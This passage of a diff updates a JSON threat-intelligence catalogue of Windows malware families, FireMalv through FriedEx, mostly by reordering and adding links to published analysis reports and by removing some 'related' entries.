"uuid": "9715c6bc-4b1e-49a2-b1d8-db4f4c4f042c",
"value": "FireMalv"
},
@@ -23337,6 +24754,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fishmaster",
"https://media-exp1.licdn.com/dms/document/C561FAQHhWFRcWmdCPw/feedshare-document-pdf-analyzed/0/1639591145314?e=1658966400&v=beta&t=_uCcyEVg6b_VDiBTvWQIXtBOdQ1GQAAydqGyq62KA3E",
+ "https://speakerdeck.com/aragorntseng/winnti-is-coming-evolution-after-prosecution-at-hitcon2021",
"https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/"
],
"synonyms": [
@@ -23352,18 +24770,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fivehands",
- "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
"https://research.nccgroup.com/2021/06/15/handy-guide-to-a-new-fivehands-ransomware-variant/",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126b",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a",
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html",
"https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html",
+ "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
"https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/",
- "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+ "https://www.crowdstrike.com/blog/new-ransomware-variant-uses-golang-packer/",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://www.bleepingcomputer.com/news/security/yanluowang-ransomware-operation-matures-with-experienced-affiliates/"
],
"synonyms": [
"Thieflock"
@@ -23378,11 +24796,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flagpro",
- "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech",
"https://cyberandramen.net/2021/12/12/more-flagpro-more-problems/",
+ "https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro",
+ "https://insight-jp.nttsecurity.com/post/102hf3q/flagpro-the-new-malware-used-by-blacktech",
"https://vblocalhost.com/uploads/VB2021-50.pdf",
"https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_8_hara_en.pdf",
- "https://insight-jp.nttsecurity.com/post/102h7vx/blacktechflagpro"
+ "https://jp.security.ntt/resources/EN-BlackTech_2021.pdf"
],
"synonyms": [
"BUSYICE"
@@ -23397,28 +24816,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flame",
- "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache",
- "https://www.crysys.hu/publications/files/skywiper.pdf",
"https://securelist.com/the-flame-questions-and-answers-51/34344/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
"https://storage.googleapis.com/chronicle-research/Flame%202.0%20Risen%20from%20the%20Ashes.pdf",
- "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments"
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
+ "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=ce2df4da-afe9-4a24-b28c-0fb3ba671d95&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments",
+ "https://github.com/juanandresgs/papers/raw/master/Flame%202.0%20Risen%20from%20the%20Ashes.pdf",
+ "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf",
+ "https://www.crysys.hu/publications/files/skywiper.pdf"
],
"synonyms": [
"sKyWIper"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "d7963066-62ed-4494-9b8c-4b8b691a7c82",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "c40dbede-490f-4df4-a242-a2461e3cfc4e",
"value": "Flame"
},
@@ -23427,8 +24838,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flashflood",
- "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf",
- "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf"
+ "https://www.mandiant.com/sites/default/files/2021-09/rpt-apt30.pdf",
+ "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
],
"synonyms": [],
"type": []
@@ -23441,28 +24852,28 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedammyy",
- "https://attack.mitre.org/software/S0381/",
- "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
"https://threatrecon.nshc.net/2019/08/29/sectorj04-groups-increased-activity-in-2019/",
- "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
- "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south",
- "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/",
"https://habr.com/ru/company/pt/blog/475328/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat",
+ "https://www.proofpoint.com/us/threat-insight/post/leaked-source-code-ammyy-admin-turned-flawedammyy-rat",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/operation-ta505/",
+ "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do",
"https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
+ "https://www.proofpoint.com/us/threat-insight/post/ta505-begins-summer-campaigns-new-pet-malware-downloader-andromut-uae-south",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/ta505-at-it-again-variety-is-the-spice-of-servhelper-and-flawedammyy/",
+ "https://secrary.com/ReversingMalware/AMMY_RAT_Downloader/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://attack.mitre.org/software/S0381/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
"https://www.youtube.com/watch?v=N4f2e8Mygag",
- "https://www.sans.org/reading-room/whitepapers/reverseengineeringmalware/unpacking-decrypting-flawedammyy-38930"
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://intel471.com/blog/a-brief-history-of-ta505"
],
"synonyms": [],
"type": []
@@ -23475,21 +24886,22 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flawedgrace",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
- "https://twitter.com/MsftSecIntel/status/1273359829390655488",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem",
"https://www.proofpoint.com/us/blog/threat-insight/whatta-ta-ta505-ramps-activity-delivers-new-flawedgrace-variant",
- "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
- "https://intel471.com/blog/a-brief-history-of-ta505",
"https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
- "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
- "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace"
+ "https://www.secureworks.com/research/threat-profiles/gold-tahoe",
+ "https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/",
+ "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
+ "https://intel471.com/blog/a-brief-history-of-ta505",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf",
+ "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
+ "https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem",
+ "https://research.nccgroup.com/2021/12/01/tracking-a-p2p-network-related-with-ta505/",
+ "https://www.proofpoint.com/us/threat-insight/post/servhelper-and-flawedgrace-new-malware-introduced-ta505",
+ "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
+ "https://twitter.com/MsftSecIntel/status/1273359829390655488"
],
"synonyms": [
"GraceWire"
@@ -23517,26 +24929,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.floki_bot",
- "http://adelmas.com/blog/flokibot.php",
- "http://blog.talosintel.com/2016/12/flokibot-collab.html#more",
- "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/",
- "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html",
"https://blog.malwarebytes.com/threat-analysis/2016/11/floki-bot-and-the-stealthy-dropper/",
+ "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/",
"https://www.flashpoint-intel.com/blog/cybercrime/floki-bot-emerges-new-malware-kit/",
- "https://www.flashpoint-intel.com/flokibot-curious-case-brazilian-connector/"
+ "https://www.cylance.com/en_us/blog/threat-spotlight-flokibot-pos-malware.html",
+ "http://adelmas.com/blog/flokibot.php",
+ "https://www.arbornetworks.com/blog/asert/flokibot-flock-bots/",
+ "http://blog.talosintel.com/2016/12/flokibot-collab.html#more"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "8034978b-3a32-4662-b1bf-b525e59e469f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "057ff707-a008-4ab8-8370-22b689ed3412",
"value": "FlokiBot"
},
@@ -23545,12 +24948,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flowcloud",
- "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
- "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
- "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
"https://www.ironnet.com/blog/china-cyber-attacks-the-current-threat-landscape",
- "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis",
- "https://nao-sec.org/2021/01/royal-road-redive.html"
+ "https://www.dragos.com/blog/industry-news/new-ics-threat-activity-group-talonite/",
+ "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/",
+ "https://nao-sec.org/2021/01/royal-road-redive.html",
+ "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new",
+ "https://www.proofpoint.com/us/blog/threat-insight/flowcloud-version-413-malware-analysis"
],
"synonyms": [],
"type": []
@@ -23563,8 +24966,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.flowershop",
- "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf",
- "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf"
+ "https://storage.googleapis.com/chronicle-research/STUXSHOP%20Stuxnet%20Dials%20In%20.pdf",
+ "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf"
],
"synonyms": [],
"type": []
@@ -23630,11 +25033,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fobber",
- "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/",
"http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html",
- "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber",
+ "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf",
"http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html",
- "http://www.govcert.admin.ch/downloads/whitepapers/govcertch_fobber_analysis.pdf"
+ "https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber",
+ "https://blog.malwarebytes.com/threat-analysis/2015/06/elusive-hanjuan-ek-caught-in-new-malvertising-campaign/"
],
"synonyms": [],
"type": []
@@ -23647,8 +25050,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix",
- "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/",
- "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/"
+ "https://labs.bitdefender.com/2021/02/fonix-ransomware-decryptor/",
+ "https://labs.sentinelone.com/the-fonix-raas-new-low-key-threat-with-unnecessary-complexities/"
],
"synonyms": [],
"type": []
@@ -23661,73 +25064,73 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook",
- "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent",
+ "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption",
+ "https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/",
+ "https://usualsuspect.re/article/formbook-hiding-in-plain-sight",
+ "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
"https://www.connectwise.com/resources/formbook-remcos-rat",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
- "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/",
"https://www.peerlyst.com/posts/how-to-understand-formbook-a-new-malware-as-a-service-sudhendu?",
+ "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
+ "https://www.peerlyst.com/posts/how-to-analyse-formbook-a-new-malware-as-a-service-sudhendu?trk=explore_page_resources_recent",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii",
+ "https://threatresearch.ext.hp.com/wp-content/uploads/2021/03/HP_Bromium_Threat_Insights_Report_Q4_2020.pdf",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ipfs-a-new-data-frontier-or-a-new-cybercriminal-hideout",
+ "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/",
+ "https://research.loginsoft.com/threat-research/from-innocence-to-malice-the-onenote-malware-campaign-uncovered/",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/trojanized-onenote-document-leads-to-formbook-malware/",
+ "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
+ "https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/",
+ "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
+ "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
+ "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view",
+ "https://youtu.be/aQwnHIlGSBM",
+ "https://link.medium.com/uaBiIXgUU8",
+ "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
+ "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
+ "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I",
+ "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-malware-by-exploiting-cve-2017-11882",
+ "https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/",
+ "https://blog.talosintelligence.com/2018/06/my-little-formbook.html",
+ "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/",
+ "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
+ "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf",
+ "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
+ "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html",
+ "https://www.malwarebytes.com/blog/threat-intelligence/2022/20221121-threat-intel-report-final.pdf",
+ "https://www.trellix.com/en-us/about/newsroom/stories/research/cyberattacks-targeting-ukraine-increase.html",
+ "https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
+ "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
+ "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html",
+ "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
+ "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/",
+ "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
+ "https://isc.sans.edu/diary/26806",
+ "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/",
"https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors",
+ "https://asec.ahnlab.com/en/32149/",
+ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two",
+ "https://news.sophos.com/en-us/2020/05/14/raticate/",
"http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html",
"https://www.cyren.com/blog/articles/example-analysis-of-multi-component-malware",
- "https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption",
- "https://blog.talosintelligence.com/2018/06/my-little-formbook.html",
- "https://www.arbornetworks.com/blog/asert/formidable-formbook-form-grabber/",
- "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware",
- "https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/",
- "https://blog.netlab.360.com/purecrypter",
- "https://cert.gov.ua/article/955924",
- "https://blog.malwarebytes.com/threat-analysis/2021/05/revisiting-the-nsis-based-crypter/",
- "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
- "https://threatresearch.ext.hp.com/javascript-malware-dispensing-rats-into-the-wild/",
- "https://www.trendmicro.com/en_us/research/21/i/formbook-adds-latest-office-365-0-day-vulnerability-cve-2021-404.html",
- "https://news.sophos.com/en-us/2020/05/14/raticate/",
- "https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://link.medium.com/uaBiIXgUU8",
- "https://isc.sans.edu/diary/26806",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://www.lac.co.jp/lacwatch/report/20220307_002893.html",
"https://yoroi.company/research/office-documents-may-the-xll-technique-change-the-threat-landscape-in-2022/",
"http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://www.cyberbit.com/blog/endpoint-security/formbook-research-hints-large-data-theft-attack-brewing/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer",
- "https://blog.talosintelligence.com/2019/07/sweed-agent-tesla.html",
- "https://youtu.be/aQwnHIlGSBM",
+ "https://cert.gov.ua/article/955924",
"https://www.netskope.com/blog/new-formbook-campaign-delivered-through-phishing-emails",
- "https://www.cyberbit.com/formbook-research-hints-large-data-theft-attack-brewing/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-new-formbook-variant-delivered-phishing-campaign-part-I",
- "https://drive.google.com/file/d/1oxINyIJfMtv_upJqRK9vLSchIBaU8wiU/view",
- "https://www.botconf.eu/wp-content/uploads/2018/12/2018-R-Jullian-In-depth-Formbook-Malware-Analysis.pdf",
- "https://www.hornetsecurity.com/en/threat-research/vba-purging-malspam-campaigns/",
- "https://tccontre.blogspot.com/2020/11/interesting-formbook-crypter.html",
- "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/",
- "https://thisissecurity.stormshield.com/2018/03/29/in-depth-formbook-malware-analysis-obfuscation-and-process-injection/",
- "https://www.fireeye.com/blog/threat-research/2017/10/formbook-malware-distribution-campaigns.html",
- "https://blog.cyble.com/2022/07/01/xloader-returns-with-new-infection-technique/",
- "https://asec.ahnlab.com/en/32149/",
- "https://www.fortinet.com/blog/threat-research/deep-analysis-formbook-new-variant-delivered-phishing-campaign-part-ii",
- "https://usualsuspect.re/article/formbook-hiding-in-plain-sight",
- "https://www.virusbulletin.com/virusbulletin/2019/01/vb2018-paper-inside-formbook-infostealer/",
- "https://insights.oem.avira.com/a-new-technique-to-analyze-formbook-malware-infections/",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
+ "https://blog.netlab.360.com/purecrypter",
+ "https://blogs.quickheal.com/formbook-malware-returns-new-variant-uses-steganography-and-in-memory-loading-of-multiple-stages-to-steal-data/",
+ "http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
+ "https://elastic.github.io/security-research/intelligence/2022/01/01.formbook-adopts-cabless-approach/article/"
],
"synonyms": [
"win.xloader"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "c7e7063b-b2a2-4046-8a19-94dea018eaa0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "8378b417-605e-4196-b31f-a0c96d75aa50",
"value": "Formbook"
},
@@ -23738,8 +25141,8 @@
"https://malpedia.caad.fkie.fraunhofer.de/details/win.former_first_rat",
"https://researchcenter.paloaltonetworks.com/2015/04/unit-42-identifies-new-dragonok-backdoor-malware-deployed-against-japanese-targets/",
"https://decoded.avast.io/luigicamastra/operation-dragon-castling-apt-group-targeting-betting-companies",
- "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
"https://threatvector.cylance.com/en_us/home/breaking-down-ff-rat-malware.html",
+ "https://unit42.paloaltonetworks.com/atoms/shallowtaurus/",
"https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/space-pirates-tools-and-connections/"
],
"synonyms": [
@@ -23795,9 +25198,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki",
"https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/",
- "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
+ "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html",
"https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
- "https://www.trendmicro.com/en_us/research/20/l/who-is-the-threat-actor-behind-operation-earth-kitsune-.html"
+ "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html"
],
"synonyms": [],
"type": []
@@ -23810,38 +25213,39 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex",
- "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/",
- "https://www.bleepingcomputer.com/news/security/new-evil-corp-ransomware-mimics-payloadbin-gang-to-evade-us-sanctions/",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/research/everis-bitpaymer-ransomware-attack-analysis-dridex/",
- "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
+ "https://www.bleepingcomputer.com/news/security/doppelpaymer-ransomware-launches-site-to-post-victims-data/",
+ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
+ "https://www.armor.com/resources/threat-intelligence/the-evolution-of-doppel-spider-from-bitpaymer-to-grief-ransomware/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/account-with-admin-privileges-abused-to-install-bitpaymer-ransomware-via-psexec",
- "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.crowdstrike.com/blog/hades-ransomware-successor-to-indrik-spiders-wastedlocker/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/ursnif-emotet-dridex-and-bitpaymer-gangs-linked-by-a-similar-loader/",
- "https://www.sentinelone.com/wp-content/uploads/2022/02/S1_-SentinelLabs_SanctionsBeDamned_final_02.pdf",
+ "https://www.crowdstrike.com/blog/big-game-hunting-the-evolution-of-indrik-spider-from-dridex-wire-fraud-to-bitpaymer-targeted-ransomware/",
"https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
+ "https://www.secureworks.com/research/threat-profiles/gold-drake",
+ "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
+ "https://killingthebear.jorgetesta.tech/actors/evil-corp",
